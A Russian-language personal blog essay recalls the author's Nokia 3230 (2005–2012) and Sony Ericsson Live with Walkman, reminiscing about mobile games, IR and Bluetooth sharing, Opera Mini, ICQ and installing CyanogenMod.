В начале июля 2005 года, взяв заработанные деньги, вдобавок изучив журнал Связного со «взрослыми игрушками», я отправился покупать новую мобилу. Как раз эти 11000 деревянных и стоил мой следующий телефон, который, кстати работал на Symbian, а также поддерживал GPRS и даже EDGE, имел Bluetooth, инфракрасный порт, поддерживал песни формата MP3, карты памяти и конечно же Java. Вот!
Nokia 3230. Мой самый первый смартфон и был действительно хорош за свою цену. Первым делом, там стояла хорошая на то время камера в 1.2 мегапикселя. Качество фото для такой камеры было весьма неплохим — 1280х960. Все потому, что сравнивать было не с чем, ведь до того, как у меня появился цифровой фотик, я фоткал на Нокию. Другое дело — видео. Шипение, плохое качество, низкое разрешение в 176х144 — полная жесть.
Также присутствовали и ИК-порт, и Bluetooth. С первым все было не так однозначно. Дело в том, что у большинства в моем окружении были телефоны Siemens, на которых не было Bluetooth, а перекидываться картинками, играми и т. д. были вынуждены именно через инфракрасный порт. А перекидывались именно таким образом:
Не лихие 90е, а беспощадные и холодные нулевые! Во-первых, перекидывая всякой всячиной через ИК-порт, телефоны нужно было ставить почти вплотную, и только так. А во-вторых, скорость передачи была крайне медленной, что для середины 2000х это была полная боль! Поэтому со временем от ИК-порта начали отказываться в пользу более быстрого Bluetooth, с которым не было почти никакого баяна.
Разрешение экрана в 176х208 для меня было действительно большим. Особенно хорошо впечатлило меня то, какой в Нокии был звук. Наверняка все мы помним те времена, когда каждый вечер и у каждого подъезда собирались парни в спортивках и на всю мощь врубали мелодийную Бутырку! О да, 48-тональная полифония — предел мечтаний любого подъездного диджея!
Теперь пришло время немного упомянуть несколько игрушек:
Во всех смыслах в серии Need for Speed венцом творения был и остается легендарный Most Wanted, и среди мобильных версий тоже. У ней есть всё: реалистичная физика, агрессивные противники, огромный город и имбовые копы. Все, за что мы любим Самого Разыскиваемого — есть в его мобильной версии.
Bounce Tales. А эта игра (которую мне скинул друг в 2009 году) — вообще классика жанра. Nokia умела делать свои игры. После залипательной змейки и увлекательной игры Bounce вышла еще одна игра про красного шарика, но на сей раз с сюжетом. Как обычно: проходишь уровни, избавляешься от всякого дерьма и спасаешь шаров, за которых играешь в дальнейшем.
Знаменитый Gravity Defied был самой попсовой мобильной игрой в моем окружении. Едешь ты на мотоцикле, а тут тебе надо аккуратно ехать по кривым и безумно сложным трассам. В общем, крутая игра, даже несмотря на адскую сложность. Помню, когда кучу времени тратил на уровни, то дрючил джойстик, из-за чего приходилось его чинить.
Игра про червячков — вообще была самой безбашенной игрой на мобилках! На одном телефоне по Bluetooth можно было сыграть хоть по несколько человек. Скажу, что до этого мы играли в безбашенных червячков у нашего знакомого, у которого был очень древний и допотопный компьютер 1996 года. А на телефоне можно сыграть в червячков где угодно и когда угодно! И даже не представить, как же тогда это было охрененно!
Были и другие игрули, но моя память уже успела их забыть 🙁
Bluetooth и инфракрасный порт были не единственными способами заполучить игру, песню или смешной видосик. На то время существовал уже более доступный мобильный интернет. Я не имею ввиду встроенный мобильный браузер, который коряво грузил страницы и отжирал много денег со счета. Решение этой дилеммы было одно — установить Opera Mini, с которой все было в порядке. Открывала она страницы адекватно и экономила счет. Самым популярным мессенджером в то время стала ICQ (она же Аська), и была она популярной даже в эпоху ВК.
Памяти в моем Нокии было мало — всего 6 мегабайт, и со временем этого начало не хватать. Потом у меня появилась карта памяти, на которой было много места (где-то 1 гигабайт, которого тогда было действительно много).
Что же, это было долгое, но прекрасное и незабываемое время с Nokia 3230. Купил ее в июле 2005 года, а была она заменена — в мае 2012-го! Поняли, да — почти 7 лет. Думаю, не стоит напоминать, какое устройство представил знаменитый Стив Джобс в 2007 году. Обыкновенные телефоны с кнопками начали оставаться в прошлом. Наступило именно то время, которое знакомо нам сейчас. Итак, пришло время упомянуть мой первый смартфон, который работал на Android, ставший к 2012 году самой популярной мобильной ОС, при этом сбросив с первенства Symbian.
Sony Ericsson Live with Walkman. Только попытайтесь вслух произнести такое дикое название! Ну ладно, неважно. Помню, когда шел по торговому центру со своей девушкой за покупками, то в одной витрины я обнаружил в продаже iPhone 4, который имел 16 гигабайт памяти и на борту была iOS 5. Но эта сволочь стоила фантастически — 22000! На следующий день я пошел покупать смартфон, перед этим узнав, что система iOS закрытая, да и ставить туда сторонние приложения нельзя.
«Куплю Айфон за более, чем 20 тысяч рублей, а взамен за такие огромные деньги я получу какую-то закрытую систему с лишением возможности устанавливать сторонний софт? Нет! Ни за что!» — подумал я, обнаружив тот самый яблочкофон. В том же магазине мне попались более дешевые аналоги на зеленом роботе. Так почему же я выбрал именно Sony Ericsson за 9000? Потому что размер и габариты для меня играли значительную роль, чтобы смартфон был не слишком маленьким и не слишком большим. К сенсорному экрану привыкнуть было раз плюнуть, ведь до этого мне повезло пощупать недорогой тачфон (Samsung S5230) одного моего приятеля, а также Sony Ericsson Xperia Mini, которым тогда пользовалась моя девушка.
Фирменная оболочка Sony мне сразу же понравилась, ведь работала вменяемо и выглядела красиво. Чего только стоят фирменный плеер Walkman, рабочий стол, экран блокировки и шторка уведомлений. Кстати про плеер, я никогда не пользовался настолько удобным плеером, как тем же Волкманом. По производительности это был среднячок, и играть в Subway Surfers, Angry Birds, Jetpack Joyride, Fruit Ninja, 2048, Hungry Shark и прочие нетребовательные игрульки было приятно и комфортно. А вот в случае с тяжелыми (для смартфона) проектами в лице GTA 3, было не настолько радужно, но тем не менее, играть можно было. Через какое-то время, на мой Сони Эриксон прилетело обновление Android до версии 4.0, после которого, к сожалению обновлений больше не было. Да и так было не все так гладко. После обновления, смартфон начал чаще тупить, зависать и охотно терял заряд аккумулятора. Спустя какое-то время, когда мне уже окончательно надоели лаги — я пытался поставить на смартфон кастомную прошивку. В итоге, мне кое-как удалось — поставил Cyanogenmod, и он работал уже значительно лучше. Мой Sony Ericsson работал шустрее и дольше держал батарею за счет «голого» Андроида. Встроенной памяти в моем Live with Walkman было немыслимо мало — всего-на-всего 300 мегабайт! Решалось все покупкой карты памяти. Тогда у меня была карта памяти на 16 гигабайт. Память была наполнена не менее, чем на 70%. Чем же у меня было столько занято? Музыкой, видео, фотками и прочим.
С тех пор у меня поменялся смартфон несколько раз, но это никакого вау-эффекта больше не вызывало. По той причине, что смартфоны последних лет начали выглядеть однообразно и стали выглядеть похожими свиду, уже больше не появлялось никакого восторга. Мы изменились. И сейчас мы имеем то, что имеем.
Такая была у меня история. Спасибо всем, кто дочитал. Не забудьте поделиться своей историей о том, какими мобильными телефонами пользовались вы, проходя весь этот долгий путь.